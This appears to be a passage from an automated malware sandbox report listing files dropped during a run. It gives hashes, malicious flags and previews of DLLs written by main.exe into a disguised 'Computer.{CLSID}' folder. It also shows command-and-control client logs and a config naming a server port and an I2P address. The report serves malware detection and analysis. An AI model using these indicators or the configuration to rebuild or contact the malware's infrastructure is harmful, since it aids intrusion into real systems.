                                                                  SSDEEP:192:R6l7wVeJ5a8mYHRprB89bfMdY7f6/Ylqm:R6lXJkNYHifMy7f6Wb
                                                                  MD5:2D35153B8F0873F66D653489CE9550C4
                                                                  SHA1:1BEAB38843AB39B8208AC78FDD488A224733329F
                                                                  SHA-256:4B932E3EF6D2A06BEE593309C8FEE30DAC4D5526BFECF584DA46C4D4523EC6B3
                                                                  SHA-512:59455F6EBCA6F42D5DEBAE484AA1F6052F92F3BB968872284761DDC5BA6FB8D44BAC3E1AF2FAE2E053DACCB49F4C69C265CF4ABF66E4293CEEC6843D20220912
                                                                  Malicious:false
                                                                  Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.4.1.2.4.<./.P.i.
                                                                  Process:C:\Windows\System32\WerFault.exe
                                                                  File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):4603
                                                                  Entropy (8bit):4.413689129586213
                                                                  Encrypted:false
                                                                  SSDEEP:48:cvIwWl8zsnJg771I9QDWpW8VYHNYm8M4JD2+AFwyq85/3Ek4hA3+Mwd:uIjfJI7jy7VZJXuIA3Zwd
                                                                  MD5:925925FA81768320B8D7B520DCE20111
                                                                  SHA1:2B17E61C17E6A2D98BA0A81AC8BC437F6695688D
                                                                  SHA-256:916F2F6DA71722BBE7A8875ADD22EBA830E4E7D418B6A154C25B0E912410CD6B
                                                                  SHA-512:29552C689074EB2A6348E779DFD2BA7941D81854CFDF9D0E3CF4D137E708AEBBD4EA8754377248810294E6C9E297E8E4439A692AFE43C6D458AB320E76A0CCDD
                                                                  Malicious:false
                                                                  Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="671669" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                                                  Process:C:\Windows\System32\svchost.exe
                                                                  File Type:data
                                                                  Category:dropped
                                                                  Size (bytes):77762
                                                                  Entropy (8bit):3.090773465565251
                                                                  Encrypted:false
                                                                  SSDEEP:768:ev/Z5HZFrRZwLI4d+y9f0IvIgk8pE1SPzNQ3Svt4QO52PVAw0:ev/5RRZwLldd+SIgxE1SbNQ3Svt4T2P6
                                                                  MD5:F4331F6F299603032F67B1E32D57E8EA
                                                                  SHA1:6AB7EBF1480C6CCD5D84F228EED05F03523F2E7B
                                                                  SHA-256:5DEBF09CD87897FC0962F17981CAFA7BB3DAB7C122957C0C29138987E3C26100
                                                                  SHA-512:B5DA03C025455BA9A4B0F5FE45D5E28B979734FECA137E49DCE8B5EF8DC833CD6482DDFDE3B35DB6E3A6FB4DCB95232D1B026EEA22B561A7D7885989CF1F4AD8
                                                                  Malicious:false
                                                                  Preview:I.m.a.g.e.N.a.m.e.,.U.n.i.q.u.e.P.r.o.c.e.s.s.I.d.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.,.W.o.r.k.i.n.g.S.e.t.P.r.i.v.a.t.e.S.i.z.e.,.H.a.r.d.F.a.u.l.t.C.o.u.n.t.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.H.i.g.h.W.a.t.e.r.m.a.r.k.,.C.y.c.l.e.T.i.m.e.,.C.r.e.a.t.e.T.i.m.e.,.U.s.e.r.T.i.m.e.,.K.e.r.n.e.l.T.i.m.e.,.B.a.s.e.P.r.i.o.r.i.t.y.,.P.e.a.k.V.i.r.t.u.a.l.S.i.z.e.,.V.i.r.t.u.a.l.S.i.z.e.,.P.a.g.e.F.a.u.l.t.C.o.u.n.t.,.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.P.e.a.k.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.Q.u.o.t.a.P.e.a.k.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.e.a.k.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.e.a.k.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.r.i.v.a.t.e.P.a.g.e.C.o.u.n.t.,.R.e.a.d.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.W.r.i.t.e.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.O.t.h.e.r.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.R.e.a.d.T.r.a.n.s.f.e.r.C.o.u.n.t.,.W.r.i.t.e.T.r.a.n.s.f.e.r.C.o.u.n.t.,.O.t.h.e.r.T.r.a.n.s.f.e.r.C.o.u.n.t.,.H.a.n.
                                                                  Process:C:\Windows\System32\svchost.exe
                                                                  File Type:data
                                                                  Category:dropped
                                                                  Size (bytes):13340
                                                                  Entropy (8bit):2.6859490762661182
                                                                  Encrypted:false
                                                                  SSDEEP:96:TiZYWuoJO0YjY8WrHjUYEZt5tKimI35QwYO7jaad2MAifIWW3:2ZDb0D4Aaad2MAiwWW3
                                                                  MD5:5BE17F607546030D0FA2B945A23BA69F
                                                                  SHA1:5E4B316794FA60DB74D8D2D487B44B051D7E97A5
                                                                  SHA-256:047237E755C3E19AE940406EF46DFB8960C9B377AC7DE338399A5B201E9176AC
                                                                  SHA-512:2E70A923005BA2E10D1FE1ADC5DB2B5E84431708924F5AB2DF81DB560C73723061BC2AD7E5C203AAF6E4FB63056E67AAA9657ED87B384A69164755A580A5EED5
                                                                  Malicious:false
                                                                  Preview:B...T.i.m.e.r.R.e.s.o.l.u.t.i.o.n. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .1.5.6.2.5.0.....B...P.a.g.e.S.i.z.e. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .4.0.9.6.....B...N.u.m.b.e.r.O.f.P.h.y.s.i.c.a.l.P.a.g.e.s. . . . . . . . . . . . . . . . . . . . . . . . . . .1.0.4.8.3.3.3.....B...L.o.w.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . . . . . . . . .2.....B...H.i.g.h.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . .1.3.1.0.7.1.9.....B...A.l.l.o.c.a.t.i.o.n.G.r.a.n.u.l.a.r.i.t.y. . . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.i.n.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.a.x.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . .1.4.0.7.3.7.4.8.8.2.8.9.7.9.1.....B...A.c.t.i.v.e.P.r.o.c.e.s.s.o.r.s.A.f.f.i.n.i.t.y.M.a.s.k. . . . . . .
                                                                  Process:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
                                                                  File Type:PE32+ executable (DLL) (console) x86-64 (stripped to external PDB), for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):115712
                                                                  Entropy (8bit):6.193969228624904
                                                                  Encrypted:false
                                                                  SSDEEP:1536:55YoK6WOBqFp//wVUE/+TGAf5EkgE1duJmwTxOd/lZ1pgX7:55YoSb/Iv/+TNf5Ee1YLTxOd9Z16X7
                                                                  MD5:EC9499EE84ED09B77BE0A35EC87B781C
                                                                  SHA1:4148D40284BAB415DDB828BD4061A4FE93C9AF26
                                                                  SHA-256:5E38EA7E3DD96FE1C6BB2EBA38C7BDE638C6B6E7898F906E343D9500AFF86499
                                                                  SHA-512:D65933B825419719021D0D2F43B45616A5B1238550BFDC72D2F4F148E284E9FE488417021A45B6D2F61770E31150B3331B1071AFE7EBB85AF6B379D040A9BEBC
                                                                  Malicious:true
                                                                  Antivirus:
                                                                  • Antivirus: ReversingLabs, Detection: 26%
                                                                  Joe Sandbox View:
                                                                  • Filename: cZO.exe, Detection: malicious, Browse
                                                                  • Filename: DF2.exe, Detection: malicious, Browse
                                                                  • Filename: ET5.exe, Detection: malicious, Browse
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d.................."...*............Y........."h.............................P......JA....`... .........................................^....................................@..l...............................(.......................h............................text...x...........................`..`.data........0....... ..............@....rdata.. d...@...f...*..............@..@.pdata..............................@..@.xdata..............................@..@.bss.....................................edata..^...........................@..@.idata..............................@....CRT....X.... ......................@....tls.........0......................@....reloc..l....@......................@..B........................................................................................................................................................................
                                                                  Process:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
                                                                  File Type:ASCII text, with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):3639
                                                                  Entropy (8bit):5.675612292618023
                                                                  Encrypted:false
                                                                  SSDEEP:96:idH9NYJ9VX3YPQYPTNYP6YPtYP/YPVsHQHhMyLOT58Lek1:AdNiTHXoNZ84UswBMHT561
                                                                  MD5:4E0EADA848022B5360521F2BD22925D6
                                                                  SHA1:7CB3B5DCE6F73C2A607235CDC1F5B45A9FADE17E
                                                                  SHA-256:9DB7484AF675B6691BD76FA61832F9AA0E832DAA7251DB85741DE12BCBFFBA19
                                                                  SHA-512:86A4BB178D3658DC3D446381036A5FDE02C6F306791A6ACBA50EA8D3386CE599FEBCACAFD0BC5F5111C94EC08A259BB96482C9B5BA35FC4D40862048D6E471A4
                                                                  Malicious:false
                                                                  Preview:[I] (debug_init) -> Log open success(flog_path=C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\cnccli.log)..[I] (debug_init) -> Done..[D] (ini_get_sec) -> Done(name=main)..[D] (ini_get_var) -> Done(sec=main,name=version,value=400004957b19a09d)..[I] (module_load) -> Done(name=ntdll.dll,ret=0x00007ffe22170000)..[D] (module_get_proc) -> Done(hnd=0x00007ffe22170000,name=RtlGetVersion,ret=0x00007ffe221ae520)..[I] (sys_init) -> GetWindowsDirectoryA done(sys_win_dir=C:\Windows)..[D] (registry_get_value) -> Done(root=0xffffffff80000002,key=SOFTWARE\Microsoft\Cryptography,param=MachineGuid)..[I] (sys_init) -> GetWindowsDirectoryA done(sys_mach_guid=9e146be9-c76a-4720-bcdb-53011b87bd06)..[I] (sys_init) -> GetVolumeInformationA done(vol=C:\,vol_sn=571c4e6c)..[I] (sys_init) -> Done(sys_uid=c76a8f08571c4e6c,sys_os_ver=10.0.19045.0.0)..[I] (net_init) -> Done..[I] (ebus_init) -> Done..[D] (ini_get_sec) -> Done(name=cnccli)..[D] (ini_get_var) -> Done(sec=cnccli,name=server_host,value=9
                                                                  Process:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
                                                                  File Type:Generic INItialization configuration [cnccli]
                                                                  Category:dropped
                                                                  Size (bytes):213
                                                                  Entropy (8bit):5.129024990254676
                                                                  Encrypted:false
                                                                  SSDEEP:6:1EVQLD4oWuJO+70XZ6DIzOD7kXpTRL9gWVUDeLn:Cjo5JO+70XZmeC7kX9vgpKL
                                                                  MD5:7D88563AD41BAF4026CFC5D098CBF40D
                                                                  SHA1:442756834CCCEB84F219F3C762852437FBB3458E
                                                                  SHA-256:D80EDD4C9FCF10348AAAB4D5F9D796AD827271827463D71FE32F2F896D0841D3
                                                                  SHA-512:F58A28FCAC43359D217C5B238C00BE73FBA791BEC7B987AA647F6FF02A7514D4C4B7449968DF9237D3B4D5BBF05DBEA82C8B41C956B2F0566FAE8C54056010DF
                                                                  Malicious:false
                                                                  Preview:[main]..version=400004957b19a09d..[cnccli]..server_host=9ad81489..server_port=41674..server_timeo=15000..i2p_try_num=5..i2p_sam3_timeo=15000..i2p_addr=2lyi6mgj6tn4eexl6gwnujwfycmq7dcus2x42petanvpwpjlqrhq.b32.i2p..
                                                                  Process:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
                                                                  File Type:PE32+ executable (DLL) (console) x86-64 (stripped to external PDB), for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):104448
                                                                  Entropy (8bit):6.236071662185895
                                                                  Encrypted:false
                                                                  SSDEEP:1536:v6YjTy83xoAWVbgh4xf4j0+Fwpj7bx8eSlsfe1tgvEK335:v6Yjqj1gh4xf4w+G7Cge1tgb335
                                                                  MD5:CE579A1BDCB9763DAFEBF01AD29F918C
                                                                  SHA1:F3E317C09E27DD0DA11AEE1578B7034BA1AC15DD
                                                                  SHA-256:0B628EA2BA9CD77621D90A0A7456659ED86C118EB7655F6074B3B5648BAC0A02
                                                                  SHA-512:EB688ED1A4AC5C3B975C2B005BE4BFD04D7CC762AF18DED190D0F903D39BDB301EADB800866BA72F6B8C36B7ABFB5765E0EB5081158C67BC33F056BD41280BC3
                                                                  Malicious:true
                                                                  Antivirus:
                                                                  • Antivirus: ReversingLabs, Detection: 8%
                                                                  Joe Sandbox View:
                                                                  • Filename: cZO.exe, Detection: malicious, Browse
                                                                  • Filename: DF2.exe, Detection: malicious, Browse
                                                                  • Filename: ET5.exe, Detection: malicious, Browse
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d.................."...*............Y.........?..............................0......Uu....`... .........................................^.......................$............ ..l........................... v..(.......................`............................text...............................`..`.data...............................@....rdata...a... ...b..................@..@.pdata..$............h..............@..@.xdata..T............r..............@..@.bss.... ................................edata..^............|..............@..@.idata...............~..............@....CRT....X...........................@....tls................................@....reloc..l.... ......................@..B........................................................................................................................................................................
                                                                  Process:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
                                                                  File Type:ASCII text, with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):1021
                                                                  Entropy (8bit):5.449568174515338
                                                                  Encrypted:false
                                                                  SSDEEP:24:CFAGHS+5lGyclY7Gfy6BgT7cRE9FLxJDJF0ERDXYSae:CFdHS+54yclDYcm9FL/ff/P
                                                                  MD5:8A195246D205C46F7D683115E1106284
                                                                  SHA1:BA84FEA5A72817726F427DAB3BA1217CA13E1A6D
                                                                  SHA-256:C31BBFA8CA684604D7292E47C7C90D9D4B2140407A18CBC9CFE42C66D415CFB8
                                                                  SHA-512:111F3228C094C7BC4541DAC8E1D3758233BEE063F12F28DAED755148C0740DD6C9BFD5A9AEFC1B6BF2F75E1754AD0953EC95086D68837B068217721E6413A79F
                                                                  Malicious:false
                                                                  Preview:[I] (debug_init) -> Log open success(flog_path=C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\dwlmgr.log)..[I] (debug_init) -> Done..[D] (ini_get_sec) -> Done(name=main)..[D] (ini_get_var) -> Done(sec=main,name=version,value=400004957b19a09d)..[I] (module_load) -> Done(name=ntdll.dll,ret=0x00007ffe22170000)..[D] (module_get_proc) -> Done(hnd=0x00007ffe22170000,name=RtlGetVersion,ret=0x00007ffe221ae520)..[I] (sys_init) -> GetWindowsDirectoryA done(sys_win_dir=C:\Windows)..[D] (registry_get_value) -> Done(root=0xffffffff80000002,key=SOFTWARE\Microsoft\Cryptography,param=MachineGuid)..[I] (sys_init) -> GetWindowsDirectoryA done(sys_mach_guid=9e146be9-c76a-4720-bcdb-53011b87bd06)..[I] (sys_init) -> GetVolumeInformationA done(vol=C:\,vol_sn=571c4e6c)..[I] (sys_init) -> Done(sys_uid=c76a8f08571c4e6c,sys_os_ver=10.0.19045.0.0)..[I] (net_init) -> Done..[I] (ebus_init) -> Done..[I] (ebus_subscribe) -> Done(handler=0x00007ffe11741dbd)..[I] (tcp_connect) -> Done(sock=0x374,host=7
                                                                  Process:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
                                                                  File Type:PE32+ executable (DLL) (console) x86-64 (stripped to external PDB), for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):92672
                                                                  Entropy (8bit):6.229119632298774
                                                                  Encrypted:false
                                                                  SSDEEP:1536:nZifIZPVsBXHCrwIxk8i/57CDDCZUohgfNGbDN:nZifcsVCrwI0CyZUocs
                                                                  MD5:7FEA520E80E7A73252F2A5C204BBF820
                                                                  SHA1:557D33F75805669A6D5E98D0E6CD3B790ECF3464
                                                                  SHA-256:64B09FAC89FC9645DFE624D832BB2FF2FC8BA6BA9BC1A96C6EEE8C7F9C021266
                                                                  SHA-512:6A8FE49BC671B2B1458C24E10509047B50150D3D565FC7FB45046A51C295E69189F35D53BA2F8727A44718F11E8A84EFDE019E5422E025767CF35FDA26F293F9
                                                                  Malicious:true
                                                                  Antivirus:
                                                                  • Antivirus: ReversingLabs, Detection: 32%
                                                                  Joe Sandbox View:
                                                                  • Filename: cZO.exe, Detection: malicious, Browse
                                                                  • Filename: DF2.exe, Detection: malicious, Browse
                                                                  • Filename: ET5.exe, Detection: malicious, Browse
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d.................."...*.....f......Y.........Io..........................................`... .........................................^....................`..................l............................J..(....................................................text...............................`..`.data...............................@....rdata...U.......V..................@..@.pdata.......`.......<..............@..@.xdata.......p.......F..............@..@.bss....`................................edata..^............P..............@..@.idata...............R..............@....CRT....X............d..............@....tls.................f..............@....reloc..l............h..............@..B........................................................................................................................................................................
                                                                  Process:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
                                                                  File Type:ASCII text, with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):6080
                                                                  Entropy (8bit):5.40827259508853
                                                                  Encrypted:false
                                                                  SSDEEP:48:CFdHs54yclDYcm9FL/fzBMcF9EkGE4rkhE33NE1MEoF:idHrNYJ9VXzBt7EtEVEtEGEoF
                                                                  MD5:154026EBC0134A0A1DBF5815C79433EE
                                                                  SHA1:A2B9EA26C8BB521F32A29728301D2A1EF9554B97
                                                                  SHA-256:D912A0CBBA8B00628E492EE73325E2A099ED5919B3F4416972A68465488E0498
                                                                  SHA-512:55FA4424AD6FA8FBDD55C6AFF4C1ABF85C6D91534EDED58DF1C98969F8908F9C9B62561B14821AEB74026DEC68806BF9A1C1136DF322391EBEB7FDE4F8621EE4
                                                                  Malicious:false
                                                                  Preview:[I] (debug_init) -> Log open success(flog_path=C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\evtsrv.log)..[I] (debug_init) -> Done..[D] (ini_get_sec) -> Done(name=main)..[D] (ini_get_var) -> Done(sec=main,name=version,value=400004957b19a09d)..[I] (module_load) -> Done(name=ntdll.dll,ret=0x00007ffe22170000)..[D] (module_get_proc) -> Done(hnd=0x00007ffe22170000,name=RtlGetVersion,ret=0x00007ffe221ae520)..[I] (sys_init) -> GetWindowsDirectoryA done(sys_win_dir=C:\Windows)..[D] (registry_get_value) -> Done(root=0xffffffff80000002,key=SOFTWARE\Microsoft\Cryptography,param=MachineGuid)..[I] (sys_init) -> GetWindowsDirectoryA done(sys_mach_guid=9e146be9-c76a-4720-bcdb-53011b87bd06)..[I] (sys_init) -> GetVolumeInformationA done(vol=C:\,vol_sn=571c4e6c)..[I] (sys_init) -> Done(sys_uid=c76a8f08571c4e6c,sys_os_ver=10.0.19045.0.0)..[I] (net_init) -> Done..[I] (server_init) -> CreateThread(routine_gc) done..[I] (server_init) -> CreateThread(routine_accept) done..[I] (server_init)
                                                                  Process:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
                                                                  File Type:ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):8568
                                                                  Entropy (8bit):4.958673415285098
                                                                  Encrypted:false
                                                                  SSDEEP:96:e+I8WTr7LjdL33ZqPDNLWBsaBMG+xv9G86UJ5TMmyvmyLKkfUZleZnE/Ndm/7CIg:e+I8Mr7VtXl1zrrIqEVdm/7CItWR0SX
                                                                  MD5:27535CEE6740DFC50A78A0322415E67C
                                                                  SHA1:E80541CF15C8ED4C5EEDA8D8C24674A5B8A27F61
                                                                  SHA-256:FB0CDBF4E0215AE1866E97860C2AC3DD96E7498BFE2AF3D82378041CDFF7F292
                                                                  SHA-512:25F11A8262B5A2F59BD6C9D8673B5AD5A140EAE8C007244810B2924EB08B5CF54AE19E61BE5139319877278D11868BBD85BD2E6C67F5FAD4E2A458E2844EBC0C
                                                                  Malicious:false
                                                                  Preview:## Configuration file for a typical i2pd user.## See https://i2pd.readthedocs.io/en/latest/user-guide/configuration/.## for more options you can use in this file...## Lines that begin with "## " try to explain what's going on. Lines.## that begin with just "#" are disabled commands: you can enable them.## by removing the "#" symbol...## Tunnels config file.## Default: ~/.i2pd/tunnels.conf or /var/lib/i2pd/tunnels.conf.# tunconf = /var/lib/i2pd/tunnels.conf..## Tunnels config files path.## Use that path to store separated tunnels in different config files..## Default: ~/.i2pd/tunnels.d or /var/lib/i2pd/tunnels.d.# tunnelsdir = /var/lib/i2pd/tunnels.d..## Path to certificates used for verifying .su3, families.## Default: ~/.i2pd/certificates or /var/lib/i2pd/certificates.# certsdir = /var/lib/i2pd/certificates..## Where to write pidfile (default: /run/i2pd.pid, not used in Windows).# pidfile = /run/i2pd.pid..## Logging configuration section.## By default logs go to stdout with level 'inf
                                                                  Process:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
                                                                  File Type:data
                                                                  Category:dropped
                                                                  Size (bytes):75977
                                                                  Entropy (8bit):7.8696816318811385
                                                                  Encrypted:false
                                                                  SSDEEP:1536:07klNoOPsg0evjAYqVwbLhhOW6xwz0U0paUgfVnsHk:EkPNPmevj5qabL9ydgNz
                                                                  MD5:E53A179BB45CD7EDD8371740D65076BD
                                                                  SHA1:6B74034746E12C2058614A9DF671C31B79EAA7E9
                                                                  SHA-256:C33D095DBFFC43047A7930EB0811B11208D166FCFD612D8ED32556A6CE82B9DB
                                                                  SHA-512:767105F8B88CD8C9E4E2BD9188C8174D5FD86D370D2E6A79B0E10EF4A79E994F24F8DB7A79C481B97F69DBEA8E311590E3B2D31E804EC5F572A3C37CF3EBC457
                                                                  Malicious:false
                                                                  Preview:I2Psu3................&.................1733281205......reseed@cnc.netPK........./.Y.o2*........;...routerInfo-eXkkiGm0Hskmt-0nixI7Fd2~NX5o5Laplk3k9Fh6Jr0=.dat..|f........59/}.w...............X.O..Q#.....M;`vv...oZ..;...U....gm..w._.y.......g.\....T..9<....v{...].K..Z..`....W..kX..7iu..bi..)..<.E.{.g..Q..v...RU....f.:~U-r.v.0.?I.c..S.W"U...P..9..*!..=+....oY..gY....m;t...n..mu.y...$q...,.?.._..v.n.z..m......Q....x....\..f.M.E31.[.xu._....K...:.1.i.i"..{c:>.YU.x...Gl.F.+......<..t..r....M....t....iy=....c0wWG.....-.lW.{.....w..\.g.2.0..1.......L..P....j.X..XPl..db.i..f`f....Y.o....T.P....._..d..f....h._..ik..ZQ``.ehnlldajd`..2.....C..`B.&.f.....:.n........)>.i...Q.I.a.f...N..ai.Ynn..f.I&. -..:.y.y^....N...N....~e!.^a...y.ai.n..i..`-F.:.UNf.e.&I..N...y...y.....>%n&en.......fU`..$..|dinjb`.$ B@.......X.Y.B..l9,,....L,...mu....s3....."...r<+.=...C.."...R.."LS..3.+...0..2.Y...../.9.......&`..-M.,.K\+...M2....}.#.........+s..".K.M`.20.@.3 .5/
                                                                  Process:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
                                                                  File Type:data
                                                                  Category:dropped
                                                                  Size (bytes):512
                                                                  Entropy (8bit):7.636058759913397
                                                                  Encrypted:false
                                                                  SSDEEP:12:b+9D/7PYhcX/J3dcKjDx3ZIV/CT4uuxZ1F0ifspE6Sp1dANFGkJ:bUDTwCc+wO4uoZ/0CmSp1W3R
                                                                  MD5:65FA96388D2EE8EC45C825ADFB1E2C77
                                                                  SHA1:FF9DB34131597C05E3B19FC7F45781F58F1DF67A
                                                                  SHA-256:2D3C714F1BC4C58B2CEE1CDCF158E0C50FDD552F2D3773DED4BC52BCF4948514
                                                                  SHA-512:E2BBBDBE5164C4F1FF140FAED3DFA7F22FC64CB4AAB4F4E2EA1842F299FB89B6D8423C37F7D41B308EA886C7802A0C56B26B1A1B4D8D46073F697986AD22D6B6
                                                                  Malicious:false
                                                                  Preview:nD...}...14...*qL....y....1.O...~F7O;.j..........l.J0Y...{$....N.....Z.].t.(c.uz....-~m-.]......m.._.V.....`|...o...3.X;...."=...I..m.k..~...=Oj/.y.cf.\.<8Q ..-.{{.z!..K..p.A..}.....@.r.`w.c1...*.s.Y...~/...O..8.SD...|?.'m..y.v.R@...k;`..."......".P..{...|....eB.CKF..\....C....r.....sH3...[S*..K".......a...(M.I...j"....W.93.{.C.<......7..TIv..O...gi...h.Q10. ......Bl+....K<$8Q..>..'iL....7....A.."....9#c~.g...`.T....y...4-]...|.>#.g%......Z....WO..b.......+.N..s....VE.....
                                                                  Process:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
                                                                  File Type:OpenPGP Public Key
                                                                  Category:dropped
                                                                  Size (bytes):512
                                                                  Entropy (8bit):7.563573397798872
                                                                  Encrypted:false
                                                                  SSDEEP:12:1HrttcdKN7oE/YRPYFj8leuQqNX++AlhRIqC8+G9:1QQHEYFjuQi++uhRFC6
                                                                  MD5:7DBE35BA6E53B386B6E054570A620969
                                                                  SHA1:52BA8A269D5B2436A7FC1A800B8329CBABBB227D
                                                                  SHA-256:87C6E574D60A1670F036539CE7D5625B9E6EAC1BC462920652C655EDCE3587B6
                                                                  SHA-512:8EE0C73F27BBE837A64B51585549F43F0265465A494FA95453E63B395E862C31C2E0196B72F3E346B9613BBB111091E648CF708EB578317C037A1324F6493AD6
                                                                  Malicious:false
                                                                  Preview:.....n^.8....L.}*.....$...7+,?....^!l ..4Z.....Y>.p...u.k....*m..~.v .+{.......i.Ms......U..@L..2...o.z;.[hu..nwL*..I..I.....M...ytfeN...;[c..J...2.;...0@....)....../.3...L).9..Q`G.:.#h/...lSr$N.9.._.fk..R.......5...8.^.6.....3.H.o..>........L7.I......M..=.e...R....L..c.MzV.Y....[.~'M:..-..t]WPE.....(d.l..Fl.% e.......-.}....H#.5O8......4".x;..]../:E.D{..m...J*...k.e... ./m$....B.....`&$...{2..I)u.o...n..P.....DU&t8....k`7z4.o.+.k..`8.V4...=....'(P...wS..v}.3.e.Y.....
                                                                  Process:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
                                                                  File Type:data
                                                                  Category:dropped
                                                                  Size (bytes):512
                                                                  Entropy (8bit):7.570623799270768
                                                                  Encrypted:false
                                                                  SSDEEP:12:r093zkCAokpJDCQ0Oz73za17RJFGVz8jQSpd:WzFZkpJIO3D2RJ0RSQSn
                                                                  MD5:3EEA0C9B4365C0130D6F83F5FD67C979
                                                                  SHA1:2ECEB755876526CE5856C4904CF8E6DCC8E3EFCA
                                                                  SHA-256:BE8B00B8FE07A2071CB0BABD64B1966278B52B90E2883FB9FC6BB400621B4A14
                                                                  SHA-512:5B18B68B56178924BF4742505C850A423DAFE8510CCDC545A2C4223B76CB1E1FEC1603A586CA53D33AD46AE2913EB291B5C702FC5E6815A9A3F0ACC1D4ACA64D
                                                                  Malicious:false
